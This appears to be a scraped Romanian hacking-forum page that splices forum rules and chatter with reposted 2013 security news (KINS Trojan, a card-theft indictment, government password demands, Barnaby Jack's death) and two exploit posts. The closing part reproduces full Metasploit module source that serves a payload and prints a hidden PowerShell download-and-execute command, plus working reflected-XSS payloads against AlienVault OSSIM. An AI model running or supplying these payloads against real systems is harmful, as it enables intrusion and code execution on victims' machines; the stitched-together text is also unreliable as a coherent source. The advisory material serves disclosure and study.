Matt

Le dai idei pustilor de sub 16 ani.

The Legend said : 7. Nu cere?i VIP, Moderator sau alte ranguri pentru c? nu le ve?i primi. Dac? vom avea nevoie, v? vom c?uta noi.

Top government spy agencies GCHQ and MI5 are backing audits of the cyber security strategies at the UK’s top firms in order to assess their preparedness against the threat of cyber attacks. The agencies have added their support to a letter, sent by the department of Business, Skills and Innovation (BIS), to the UK’s top FTSE 350 firms offering to carry out Cyber Governance Health Checks. However, it is unclear who would carry out the health checks, and what specifically the audit would entail. The letter, a copy of which has been seen by V3, outlines the threats facing firms from cyber attacks and the need to ensure adequate measures are in place to protect data and systems. “The cyber threat is diverse and continues to grow, from those looking to seize commercial advantage and intellectual property to those looking to destroy critical data and undermine the integrity of systems,” it reads. “Cyber attacks against companies are already causing significant damage to personal and organisational reputations and revenues.” As such, the audits are designed as a chance for firms to have their cyber security practices audited and anonymously scrutinised against their peers. This information will then be used to help firms understand where they could improve their strategies. “The Cyber Governance Health Check will provide a free and confidential set of conclusions and a comparison of your business against its peers, helping inform subsequent vulnerability discussions between the company and its external auditor," it adds. "This will better enable you and your board to understand and manage risks that have the potential to cause major damage to your business.” The programme is expected to begin in September and the government is hoping the initiative will lead to increased dialogue between industry and government on how best to tackle the scourge of cyber threats. The move comes a day after UK retailer Lakeland revealed it was hit by a sophisticated cyber attack on two of its databases that forced the firm to reset all customer passwords as a precaution. Sursa V3.co.uk

Cybercrooks have put on sale a new professional-grade Trojan toolkit called KINS that will pose plenty of problems for banks and their customers in the months and years ahead. KINS promises the ease of use of bank-account-raiding software nasty ZeuS combined with the technical support offered by the team behind Citadel (which withdrew its banking Trojan from sale in December). KINS - which infects Windows PCs at a very low level and snoops on victims' online banking to drain their accounts - therefore seems to be well poised to exploit a gap in the market created by Citadel's absence, according to Limor Kessem, a security researcher at RSA. "The moment Citadel was off the market, the deep-web enclaves, where fraudsters congregate, became awash with fraud-as-a-service deals for Trojan binaries and hosting packages," Kessem explains in an engaging blog post. "During the dry months that had suddenly befallen the lower ranking cyber criminals, a few shady malware developers attempted to make a few bucks by trying to appease them with basic malware and converted HTTP botnets - Trojans that carry out lists of tasks, equipped with a form-grabber - but even the pseudo return of the Carberp Trojan left the underground hungry for more." "The clear and resounding truth was that botmasters have not had to face such a situation since the Limbo Trojan was released in 2005. The ongoing turbulence since the leak of the Zeus code in mid-2011 has not given way to a stable offering in the underground, and it seems that professional cybercrime malware developers are just not what they used to be," she adds. Cybercrooks were even willing to team up to finance a banking Trojan project, Kessem reports. RSA researchers first heard whisperings from the digital underground about a new cybercrime tool called KINS in February; other researchers claim they first saw it in use in 2011. But today, after months of rumours, a software vendor in a closed Russian-speaking online forum announced the open sale of the KINS Trojan to the cybercrime community. The Trojan is on offer for $5,000 via the WebMoney digital currency. For now, KINS only targets Microsoft-powered machines outside of Russia. The seller denied all ties to other Trojans but RSA reports the newcomer already shares many of the features of Zeus and SpyEye, the two principle agents of malware-powered bank theft worldwide over recent years. The KINS architecture is built like both Zeus and SpyEye, with a main blob of code and DLL plugins. Crucially, the Trojan toolkit requires no technical skills to use, a pioneering feature of ZeuS. The new cybercrime toolkit also comes with an anti-Rapport plugin that featured in SpyEye, designed to foil Trusteer's widely deployed transaction security tool. It's unclear how effective this technology is in practice. Criminals can manage infected PCs using RDP (the Remote Desktop Protocol), a communications channel previously used by SpyEye. KINS is specifically designed not to infect systems in Russia and the Ukraine by avoiding computers with Russian language keyboard settings, a feature that was first introduced by Citadel in January 2012. The feature offers a way for cybercrooks based in Russian to avoid the attentions of local cops. The unknown KINS developer appears to have learned lessons from his predecessors, according to Kessem. For one thing KINS has been kept well away from Trojan trackers, a problem that plagued SpyEye and ZeuS. Trojan trackers log the command-and-control servers associated with banking Trojan attacks, helping to mitigate the consequences of malware compromises as well as assisting zombie network takedown efforts. KINS is designed to spread using popular exploit packs such as Neutrino. KINS is capable of easily infecting machines running Windows 8 and other x64 operating systems. It also embeds itself in computer drives' volume boot records so that it's activated almost as soon as the machines are powered on. That makes infections both more stealthy and harder to eradicate because the malicious code is executed before the operating system proper starts up. "With all other major malware developers choosing to lay low to avoid imminent arrest by law enforcement authorities, KINS’ author is very sure to see an immediate demand for his Trojan, so long as he can avoid capture himself and as soon as high-ranking peers sign off on its crime-grade quality," Kessem concluded. "As that happens, anti-fraud teams around the world may be dealing with a new Trojan in the very near future." ® Sursa TheRegister.co.uk

MICROBLOGGING NETWORK Twitter has apologised for taking its users' faces and rolling them into its promotional material. A blog post on the firm's website explains what happened and how bad it feels about it. Twitter says that it created some mock tweets to use in marketing guff without thinking about the fact that there might be a body behind the avatar. "An earlier version of this blog post included an image with mock tweets from real users of our platform," it says. "This was not OK. Once we became aware of this mistake we took it down immediately. We deeply apologize to the three users included in the earlier images." Twitter has named the three users affected. Apparently Twitter had put words in their mouths to say something positive about coffee. One responded saying, "don't do this again", while another questioned how it might have ever happened. Twitter has not revealed how it happened. The trio's images appeared in a blog about some new Twitter marketing business. The Twitter post says that the fake tweets have been removed, but it still has a slide stamped "revised" that clearly shows three different Twitter users gassing about coffee. , says another.They are revealed on closer inspection to come from the Twitter marketing department, which makes us wonder why no one thought to use safe, in-house people in the first place. Sursa TheInquirer.net

Stolen card data was uploaded to blank cards used by criminals to make cash withdrawals and purchases US prosecutors have launched what they say is the country's largest ever hacking fraud case. Five men in Russia and Ukraine have been charged with running a hacking operation that allegedly stole more than 160 million credit and debit card numbers from a number of major US companies over a period of seven years. Losses from the thefts amounted to hundreds of millions of dollars. Corporate victims included Nasdaq, Visa, Dow Jones and JC Penney. Paul Fishman, US Attorney for the District of New Jersey, called the case "the largest ever hacking and data scheme breach in the United States". Just three of the corporate victims reported $300m (£196m) in losses, prosecutors say. Other victims included Heartland Payment Systems, one of the world's largest credit and debit card payment processing companies; French retailer Carrefour; Dexia Bank Belgium; and 7-Eleven. The indictment identified the defendants as Vladimir Drinkman, Aleksander Kalinin, Roman Kotov and Dmitriy Smilianets, all from Russia, and Mikhail Rytikov, a Ukrainian. All five are charged with taking part in a computer hacking conspiracy and conspiracy to commit wire fraud. Mr Drinkman and Mr Kalinin specialised in penetrating network security and hacking into corporate systems, prosecutors allege, while Mr Kotov specialised in trawling through the data looking for information worth stealing. Mr Rytikov ran the anonymous web-hosting services that enabled the others to carry out their activities, while Mr Smilianets sold on the stolen data and farmed out the proceeds, prosecutors say. "This type of crime is the cutting edge," said Mr Fishman. "Those who have the expertise and the inclination to break into our computer networks threaten our economic well-being, our privacy, and our national security." One of the co-conspirators named is Albert Gonzalez, known online as "soupnazi", who was charged along with Mr Kalinin and Mr Drinkman in 2009 and is already serving 20 years for corporate data hacking. Mr Drinkman and Mr Smilianets are both in custody but the other three remain at large. Infiltrated The attacks often involved identifying weaknesses in Structured Query Language (SQL) databases and uploading malware that gave them access to corporate networks. "Sniffer" software then sought out and collected valuable personal data that the defendants could sell on to other criminals around the world. Credit card numbers were sold for $15 to $50 each, prosecutors say. This stolen data could be transferred to blank cards then used to withdraw cash or make purchases. The prosecutors said the defendants encrypted their communications and managed to disable security systems on corporate networks to prevent detection. Sursa BBC.co.uk

Secret demands mark escalation in Internet surveillance by the federal government through gaining access to user passwords, which are typically stored in encrypted form. The U.S. government has demanded that major Internet companies divulge users' stored passwords, according to two industry sources familiar with these orders, which represent an escalation in surveillance techniques that has not previously been disclosed. If the government is able to determine a person's password, which is typically stored in encrypted form, the credential could be used to log in to an account to peruse confidential correspondence or even impersonate the user. Obtaining it also would aid in deciphering encrypted devices in situations where passwords are reused. "I've certainly seen them ask for passwords," said one Internet industry source who spoke on condition of anonymity. "We push back." A second person who has worked at a large Silicon Valley company confirmed that it received legal requests from the federal government for stored passwords. Companies "really heavily scrutinize" these requests, the person said. "There's a lot of 'over my dead body.'" Some of the government orders demand not only a user's password but also the encryption algorithm and the so-called salt, according to a person familiar with the requests. A salt is a random string of letters or numbers used to make it more difficult to reverse the encryption process and determine the original password. Other orders demand the secret question codes often associated with user accounts. A Microsoft spokesperson would not say whether the company has received such requests from the government. But when asked whether Microsoft would divulge passwords, salts, or algorithms, the spokesperson replied: "No, we don't, and we can't see a circumstance in which we would provide it." Google also declined to disclose whether it had received requests for those types of data. But a spokesperson said the company has "never" turned over a user's encrypted password, and that it has a legal team that frequently pushes back against requests that are fishing expeditions or are otherwise problematic. "We take the privacy and security of our users very seriously," the spokesperson said. A Yahoo spokeswoman would not say whether the company had received such requests. The spokeswoman said: "If we receive a request from law enforcement for a user's password, we deny such requests on the grounds that they would allow overly broad access to our users' private information. If we are required to provide information, we do so only in the strictest interpretation of what is required by law." Apple, Facebook, AOL, Verizon, AT&T, Time Warner Cable, and Comcast did not respond to queries about whether they have received requests for users' passwords and how they would respond to them. Richard Lovejoy, a director of the Opera Software subsidiary that operates FastMail, said he doesn't recall receiving any such requests but that the company still has a relatively small number of users compared with its larger rivals. Because of that, he said, "we don't get a high volume" of U.S. government demands. The FBI declined to comment. Some details remain unclear, including when the requests began and whether the government demands are always targeted at individuals or seek entire password database dumps. The Patriot Act has been used to demand entire database dumps of phone call logs, and critics have suggested its use is broader. "The authority of the government is essentially limitless" under that law, Sen. Ron Wyden, an Oregon Democrat who serves on the Senate Intelligence committee, said at a Washington event this week. Large Internet companies have resisted the government's requests by arguing that "you don't have the right to operate the account as a person," according to a person familiar with the issue. "I don't know what happens when the government goes to smaller providers and demands user passwords," the person said. An attorney who represents Internet companies said he has not fielded government password requests, but "we've certainly had reset requests -- if you have the device in your possession, than a password reset is the easier way." Cracking the codes Even if the National Security Agency or the FBI successfully obtains an encrypted password, salt, and details about the algorithm used, unearthing a user's original password is hardly guaranteed. The odds of success depend in large part on two factors: the type of algorithm and the complexity of the password. Algorithms, known as hash functions, that are viewed as suitable for scrambling stored passwords are designed to be difficult to reverse. One popular hash function called MD5, for instance, transforms the phrase "National Security Agency" into this string of seemingly random characters: Computer scientists believe that, if a hash function is well-designed, the original phrase cannot be derived from the output. But modern computers, especially ones equipped with high-performance video cards, can test passwords scrambled with MD5 and other well-known hash algorithms at the rate of billions a second. One system using 25 Radeon-powered GPUs that was demonstrated at a conference last December tested 348 billion hashes per second, meaning it would crack a 14-character Windows XP password in six minutes. The best practice among Silicon Valley companies is to adopt far slower hash algorithms -- designed to take a large fraction of a second to scramble a password -- that have been intentionally crafted to make it more difficult and expensive for the NSA and other attackers to test every possible combination. One popular algorithm, used by Twitter and LinkedIn, is called bcrypt. A 2009 paper (PDF) by computer scientist Colin Percival estimated that it would cost a mere $4 to crack, in an average of one year, an 8-character bcrypt password composed only of letters. To do it in an average of one day, the hardware cost would jump to approximately $1,500. But if a password of the same length included numbers, asterisks, punctuation marks, and other special characters, the cost-per-year leaps to $130,000. Increasing the length to any 10 characters, Percival estimated in 2009, brings the estimated cracking cost to a staggering $1.2 billion. As computers have become more powerful, the cost of cracking bcrypt passwords has decreased. "I'd say as a rough ballpark, the current cost would be around 1/20th of the numbers I have in my paper," said Percival, who founded a company called Tarsnap Backup, which offers "online backups for the truly paranoid." Percival added that a government agency would likely use ASICs -- application-specific integrated circuits -- for password cracking because it's "the most cost-efficient -- at large scale -- approach." While developing Tarsnap, Percival devised an algorithm called scrypt, which he estimates can make the "cost of a hardware brute-force attack" against a hashed password as much as 4,000 times greater than bcrypt. Bcrypt was introduced (PDF) at a 1999 Usenix conference by Niels Provos, currently a distinguished engineer in Google's infrastructure group, and David Mazières, an associate professor of computer science at Stanford University. With the computers available today, "bcrypt won't pipeline very well in hardware," Mazières said, so it would "still be very expensive to do widespread cracking." Even if "the NSA is asking for access to hashed bcrypt passwords," Mazières said, "that doesn't necessarily mean they are cracking them." Easier approaches, he said, include an order to extract them from the server or network when the user logs in -- which has been done before -- or installing a keylogger at the client. Questions of law Whether the National Security Agency or FBI has the legal authority to demand that an Internet company divulge a hashed password, salt, and algorithm remains murky. "This is one of those unanswered legal questions: Is there any circumstance under which they could get password information?" said Jennifer Granick, director of civil liberties at Stanford University's Center for Internet and Society. "I don't know." Granick said she's not aware of any precedent for an Internet company "to provide passwords, encrypted or otherwise, or password algorithms to the government -- for the government to crack passwords and use them unsupervised." If the password will be used to log in to the account, she said, that's "prospective surveillance," which would require a wiretap order or Foreign Intelligence Surveillance Act order. If the government can subsequently determine the password, "there's a concern that the provider is enabling unauthorized access to the user's account if they do that," Granick said. That could, she said, raise legal issues under the Stored Communications Act and the Computer Fraud and Abuse Act. Orin Kerr, a law professor at George Washington University and a former federal prosecutor, disagrees. First, he said, "impersonating someone is legal" for police to do as long as they do so under under court supervision through the Wiretap Act. Second, Kerr said, the possibility that passwords could be used to log into users' accounts is not sufficient legal grounds for a Web provider to refuse to divulge them. "I don't know how it would violate the Wiretap Act to get information lawfully only on the ground that the information might be used to commit a Wiretap violation," he said. The Justice Department has argued in court proceedings before that it has broad legal authority to obtain passwords. In 2011, for instance, federal prosecutors sent a grand jury subpoena demanding the password that would unlock files encrypted with the TrueCrypt utility. The Florida man who received the subpoena claimed the Fifth Amendment, which protects his right to avoid self-incrimination, allowed him to refuse the prosecutors' demand. In February 2012, the U.S. Court of Appeals for the Eleventh Circuit agreed, saying that because prosecutors could bring a criminal prosecution against him based on the contents of the decrypted files, the man "could not be compelled to decrypt the drives." In January 2012, a federal district judge in Colorado reached the opposite conclusion, ruling that a criminal defendant could be compelled under the All Writs Act to type in the password that would unlock a Toshiba Satellite laptop. Both of those cases, however, deal with criminal proceedings when the password holder is the target of an investigation -- and don't address when a hashed password is stored on the servers of a company that's an innocent third party. "If you can figure out someone's password, you have the ability to reuse the account," which raises significant privacy concerns, said Seth Schoen, a senior staff technologist at the Electronic Frontier Foundation. Last updated on July 26 at 12 p.m. PT with comments from Orin Kerr. A previous update added comment from Yahoo, which responded after this article was published. Disclosure: McCullagh is married to a Google employee not involved with this issue. Sursa News.Cnet.Com

An elite hacker who was due to demonstrate how heart implants could be hacked has died unexpectedly in San Francisco. Barnaby Jack died on Thursday, the city's medical examiner's office told Reuters, but did not give more details. He had been due to give a presentation into medical device vulnerabilities at the Black Hat security conference in Las Vegas taking place next week. He had said one technique could kill a man from 30 feet (nine metres) away. IOActive, the security firm at which Mr Jack was director of embedded devices, said it was preparing a statement. In a tweet, the company said: "Lost but never forgotten our beloved pirate, Barnaby Jack has passed." His sister Amberleigh Jack, who lives in New Zealand, told Reuters news agency he was 35. Mr Jack became one of the most famous hackers on the planet after a 2010 demonstration in which he hacked a cashpoint, making it give out money. The technique was dubbed "Jackpotting". 'Social media flood' More recently, he emerged as a leading expert in the weaknesses that could be found in medical technology. Last year, he told the BBC about how he had discovered flaws in widely-used insulin pumps which allowed him to compromise the devices. The hack made it possible to control them and administer a fatal level of insulin, Mr Jack said. "My purpose was not to allow anyone to be harmed by this because it is not easy to reproduce," he told the BBC during an interview in April 2012. "But hopefully it will promote some change in these companies and get some meaningful security in these devices." Mr Jack's expertise and vivid demonstrations of his knowledge at events like Black Hat earned him the respect of many security professionals. Amberleigh Jack thanked those who have been posting messages of sympathy online. "So humbled by the social media flood of people that loved @barnaby_jack," she tweeted. "Thank you all so much for your kind words." Sursa BBC.Co.Uk

Social networking site Pinterest has launched a feature which will track user behaviour while allowing the option for users to opt out of tracking tools. The company said that its new Home Page would seek to provide users with a better-suited experience by serving up pages more suited to user interests. To do so, the site is looking to collect more data on user activities and interests. “If you’re interested, we’ll also suggest personalized pins and boards based on websites you go to that have the Pin It button,” said Pinterest software engineer Ke Chen. “So if you’re planning a party and have gone to lots of party sites recently, we’ll try to suggest boards to make your event a hit.” In rolling out the new feature, Pinterest is also looking to provide privacy controls for users. The company said that it would be adding support for the 'Do Not Track' security platform. The service will allow users to opt out of tracking platforms and automatically disable features which would keep a log of user browsing patterns. Users who opt out of the feature will be able to use the Pinterest service without having their activity logged. The 'Do Not Track' platform, has emerged as a preferred tool for privacy activists, though the platform is not without its detractors. The Sans institute has panned the platform for its opt-in nature which requires site administrators to manually add support for the platform and lets adminsitrators continue to track user behaviour. Sursa V3.co.uk

SOFTWARE DEVELOPER Mozilla has floated the idea of using Firefox users' web browsing history to deliver personalised content. Mozilla said it has been working on the idea of serving personalised recommendations to Firefox users for a year. The firm is floating the idea that by having the web browser go through the user's web history, with the user sharing those interests with third party websites, then websites can serve content that's of interest to the user. Mozilla product manager Justin Scott said that the organisation has been doing experiments on creating a user personalised web with some volunteer Firefox users who opted-in for the trial. Now the outfit is going one step further, looking at the idea of Firefox users sharing the interests gleaned from analysing their web browsing history with other websites. Scott described what the service could end up doing, "As I browse around the web, I could choose when to share those interests with specific websites for a personalized experience. Those websites could then prioritize articles on the latest gadgets and make hockey scores more visible." He said the analysis of web browser history would be done on the client with no data being sent, unless of course the user then wishes to share their interests with websites. Scott said that Mozilla is still in the experimental stage and is "testing the concept with volunteer participants". He didn't say whether Mozilla is planning on taking the idea beyond the experimental stage, but if it does Mozilla will have work to do to convince users that analysing their web browsing history and sharing it with websites isn't an invasion of privacy. Sursa TheInquirer.net

Spargerea oric?rui cont al unei victime cu ajutorul ingineriei sociale | TinKode's Blog Cyber Smart Defence Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale | TinKode's Blog Cyber Smart Defence Si ghici ce : https://rstforums.com/forum/72668-spargerea-oric-rui-cont-al-unei-victime-cu-ajutorul-ingineriei-sociale.rst Nu te inteleg.Ce doresti sa obtii ? Vii iti faci o prezentare falsa, spunand ca nu esti roman, rugandu-te pe aici de toata lumea sa primesti moderator cand tu ai acces pe forum deja.

US authorities have arrested five men alleged to have carried out the ‘largest ever’ hacking and data breach scheme, which targeted corporate networks at major institutions such as Dow Jones, Carrefour and Nasdaq, and stole data on 160 million credit cards, costing $300m. The arrests were carried out by New Jersey officers in conjunction with the US Secret Service and Department of Justice, in a coordinated case against the alleged attackers. US attorney Paul Fishman cited the scale of the operation as proof cyber crime is a major threat to the economy. “This type of crime is the cutting edge. Those who have the expertise and the inclination to break into our computer networks threaten our economic well-being, our privacy, and our national security,” he said. “This case shows there is a real practical cost because these types of frauds increase the costs of doing business for every American consumer, every day. We cannot be too vigilant and we cannot be too careful.” The five men arrested were all of Russian origin and have been picked up during the past few months at the request of the US and extradited to the country. The accused had numerous roles, such as penetrating network security systems, mining data and providing anonymous web hosting for the attacks. The authorities revealed that the gang used SQL attacks to enter the network, often waiting for many months to gain access by installing malware in their systems to create back-door entry points. The authorities said the defendants used the access to the networks to install ‘sniffer’ programmes to identify, collect and steal data from the victims’ computer networks. The defendants used computers around the world to store the data and sell it on. “In some cases, the defendants lost access to the system due to companies’ security efforts, but were able to regain access through persistent attacks,” the authorities added. This helped them take data on 160 million credit cards, at a conservative estimate, which were sold for varying prices, from $10 for each stolen American credit card number and associated data, to $50 for each European credit card number and $15 for each Canadian credit card number. The authorities said this led to losses of at least $300m for the firms targeted, although it is likely to be far higher in reality. Firms targeted included 7-Eleven, Heartland, JetBlue, Euronet, Global Payment and Diners Singapore. The US pledged it would continue to tackle high-end cyber crime and work with authorities around the world to ensure it got its targets. “As is evident by this indictment, the Secret Service will continue to apply innovative techniques to successfully investigate and arrest transnational cyber criminals,” said special agent James Mottola of the Newark Field Office. “While the global nature of cyber crime continues to have a profound impact on our financial institutions, this case demonstrates the global investigative steps that US Secret Service Special Agents are taking to ensure that criminals will be pursued and prosecuted no matter where they reside.” Sursa V3.co.uk

European businesses should be more concerned about local intelligence agencies' data-collection campaigns than the US NSA's PRISM programme, according to ex-Navy Seal and Silent Circle chief executive Mike Janke. Janke (pictured right) told V3 he is surprised media and businesses have taken such a myopic view to the National Security Agency (NSA) PRISM scandal when there is a more pressing, immediate threat on their doorstep. "Every one of them wants to ask about the NSA but if you're in Europe you're surrounded by about 12 NSAs – the Russians, the Chinese, nation states that are using their NSA-level capabilities to hack companies to give their country's economic value a leg up. There's also companies that are hacking other companies, that pay 'consulting firms' to go in and steal intellectual property," he says. The Silent Circle chief said that, given the increased number of threats and attacks targeting businesses, he was actually surprised it took a scandal like PRISM for the uproar to manifest: "All these things have been known entering the 2000s and it became very prevalent with national state hacking in 2007. There's a known understanding of what we call data collection by nation states. Then there's IP theft and criminal hacking for monetary gain and its been going on for so long that I'm actually surprised it took so long for something like PRISM for it to come to light." PRISM, the data collection campaign run by the NSA, was revealed earlier this year when ex-CIA analyst Edward Snowden leaked documents confirming the NSA had been siphoning user information from Microsoft, Facebook and Google. Following PRISM's exposure, several other intelligence agencies have been accused of mounting similar campaigns. Within the UK the GCHQ has been accused of collecting vast reserves of data by tapping into global telecoms cables, under an operation called Tempora. The operations have led to concerns the world is on the brink of a full-blown cyber cold war. Janke downplayed these suggestions reporting most military agencies are still playing catch up with intelligence agencies when it comes to cyber: "I found militaries are so dysfunctional and they are always behind the times. They have no understanding that every young 25-year-old has two or three devices they want to use and they've got policies that are 10 years old and only relate to a laptop." "They are aware of the problem but they're so slow to act they'll be hacked for three to four years before reacting thanks to the bureaucracy. We see that in Europe and America, they're really, really slow to move to fix things even though they're aware there are serious issues. They spend a year evaluating a technology, so by the time they pay for it, it's obsolete. Where we see the best is actually in special operations and intelligence agencies. They're always up to speed." Janke believes, despite the seriousness of the revelation, it has helped improve businesses' security awareness in Europe: "It wasn't really until recently that people understood that metadata is so dangerous; that government agencies and criminal organisations can collect your metadata." "We see that Europe has a good level of security-threat awareness in enterprise, but what we don't see is good policy. European companies have weaker corporate policies where they let people bring any device they want, they let them use that device, yet they don't have a very good way of controlling the devices." He adds that the trend is a marked departure from that seen in most US firms: "In America you have good policies but not good security awareness, that's the difference. We definitely find that European companies have weaker policies about how to control the communications going in and out of their offices." Janke's comments mirror the findings of the UK government, which has launched several initiatives designed to help businesses implement more robust security policies. Most recently, the UK Home Office launched a new £4m cyber awareness campaign, designed to educate businesses and citizens about the cyber threats facing them. Sursa V3.co.uk

Renowned security researcher Barnaby Jack has died unexpectedly under unknown circumstances, one week before he was due to give a talk at the Black Hat security conference. Jack was famous for demoing on stage how ATM cash machines could be hacked at the 2010 Black Hat conference. He was due to retake the stage at Black Hat next week to demonstrate a new hack that could deactivate heart pace makers from 30-yards away, similar to the fictional attack shown on popular TV show Homeland. Outside of his famous hacks, Jack was known as a skilled bug hunter, with his research covering multiple fields and areas. Jack's death was confirmed by his employer IOActive via Twitter, although no details of how he died were given. Jack's death has resulted in a sea of comments from the security community with numerous ethical hackers and researchers praising his contributions to the field. Sophos technology director James Lyne praised Jack, saying his animated live demonstrations and energy while researching should act as an example to all security researchers. "It is a sad day to learn that Barnaby Jack has passed away," he told V3. "Barnes had a substantial contribution to the field - not least kicking off a mass of interest and research in to the less considered devices in security like ATMs. "His demonstrations and research inspired many (and were awesome) and I truly hope that up and coming security professionals continue his work and passion." Other contemporaries like Apple zero-day hunter Charlie Miller and chief research officer at penetration firm Rapid7, HD Moore, expressed their admiration via Twitter. To see Jack's famous ATM hack check out the video below. Sursa V3.co.uk

Haha a dat si edit. Ti-e frica de el, este?

4. Unele categorii au regulament intern. Verific? dac? exist? un regulament sticky înainte de a posta într-o anumite categorie. În special categoriile "CERERI"(minim 10 posturi de CALITATE), "AJUTOR"(minim 10 posturi de CALITATE) sau "Bloguri ?i Bloggeri"(minim 50 posturi CALITATE).

Description : This Metasploit module quickly fires up a web server that serves the payload in powershell. The provided command will start powershell and then download and execute the payload. The IEX command can also be extracted to execute directly from powershell. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so is unlikely to trigger AV solutions and will allow to attempt local privilege escalations supplied by meterpreter etc. You could also try your luck with social engineering. Ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Author : Ben Campbell, Christopher Campbell Source : Powershell Payload Web Delivery ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Powershell Payload Web Delivery', 'Description' => %q{ This module quickly fires up a web server that serves the payload in powershell. The provided command will start powershell and then download and execute the payload. The IEX command can also be extracted to execute directly from powershell. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so is unlikely to trigger AV solutions and will allow to attempt local privilege escalations supplied by meterpreter etc. You could also try your luck with social engineering. Ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! ], 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ], [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013')) end def on_request_uri(cli, request) print_status("Delivering Payload") data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end def primer url = get_uri() download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" print_status("Run the following command on the target machine:") print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") end end

Description : Alienvault OSSIM versions prior to 4.3.0 suffer from multiple reflective cross site scripting vulnerabilities. Author : xistence Source : Alienvault OSSIM Cross Site Scripting ? Packet Storm Code : # Title: Alienvault OSSIM Open Source SIEM 4.2.3 Multiple Reflected XSS Vulnerabilities # Date: July 25, 2013 # Author: xistence ( xistence[@]0x90[.]nl ) # Vendor: AlienVault # Vendor URL: http://www.alienvault.com # Reported: June 24, 2013 # Fix: Upgrade to version 4.3.0 Timeline: --------- 24 Jun 2013: Vulnerability Reported to AlienVault 25 Jul 2013: Still no Vendor response. xx Jul 2013: Vendor has released version 4.3.0. Version 4.3.0 is not vulnerable to these vulnerability, probably fixed by vendor. 25 Jul 2013: Public Disclosure Vendor Description: ------------------- AlienVault's open source SIEM project, OSSIM, created in 2003, is the most widely used SIEM offering with over 195,000 downloads in 175 countries. OSSIM provides all of the features that a security professional needs from a SIEM offering event collection, normalization, and correlation. Established and launched by security engineers out of necessity, OSSIM was created with an understanding of the reality many security professionals face: a SIEM is useless without the basic security controls necessary for security visibility. OSSIM addresses this reality by providing the essential security capabilities built into a unified platform. Standing on the shoulders of the many proven open source security controls built into the platform, OSSIM continues to be the fastest way to make the first steps towards unified security visibility. AlienVault provides ongoing development for OSSIM because we believe that everyone should have access to sophisticated security technologies; this includes the researchers who need a platform for experimentation, and the unsung heroes who can't convince their companies that security is a problem. Vulnerability Details: ---------------------- OSSIM 4.2.3 and lower is vulnerable to multiple reflected cross site scripting (XSS) vulnerabilities. The PHP code does seem to sanitize a lot of input to protect against XSS/SQLi/etc. such as disallowing <script> code tags. However, it's possible to inject <img src=a onerror=[javascriptcode]> to execute javascript code on the client browser. Below are the reflected XSS vulnerabilities. [ 0x01 - Reflected XSS GET ] https:// <IP>/ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E https:// <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu="><img%20src%3da%20onerror%3dalert('XSS')> https:// <IP>/ossim/av_inventory/task_edit.php?section="><img%20src%3da%20onerror%3dalert('XSS')> https:// <IP>/ossim/nfsen/rrdgraph.php?cmd=get-detailsgraph&profile=<img%20src%3da%20onerror%3dalert('XSS')> [ 0x02 - Reflected XSS POST request #1 ] POST /ossim/vulnmeter/simulate.php HTTP/1.1 Host: <IP> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https:// <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1 Content-Length: 72 Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah Connection: keep-alive Pragma: no-cache Cache-Control: no-cache hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=<img%20src%3da%20onerror%3dalert('XSS')>&targets=blah [ 0x03 - Reflected XSS POST request #2 ] POST /ossim/vulnmeter/simulate.php HTTP/1.1 Host: <IP> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https:// <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1 Content-Length: 72 Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah Connection: keep-alive Pragma: no-cache Cache-Control: no-cache hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=Null&targets=blah<img%20src%3da%20onerror%3dalert('XSS')>

